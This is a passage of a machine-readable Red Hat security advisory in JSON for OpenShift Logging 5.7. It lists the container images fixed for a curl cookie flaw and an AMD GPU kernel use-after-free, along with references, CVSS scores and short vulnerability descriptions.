"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-46218"
},
{
"category": "external",
"summary": "RHBZ#2252030",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252030"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-46218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46218"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-46218",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46218"
},
{
"category": "external",
"summary": "https://curl.se/docs/CVE-2023-46218.html",
"url": "https://curl.se/docs/CVE-2023-46218.html"
}
],
"release_date": "2023-12-06T07:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "curl: information disclosure by exploiting a mixed case flaw"
},
{
"cve": "CVE-2023-51042",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259866"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Linux kernel\u0027s AMD GPU driver which may allow access to members of a synchronization structure after the structure is freed. This issue could allow a local user to crash the system or to access confidential system memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only applicable to the amdgpu module, which is typically only loaded on systems that use AMD GPU hardware. Use the `lsmod` command to determine whether the amdgpu module is loaded.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
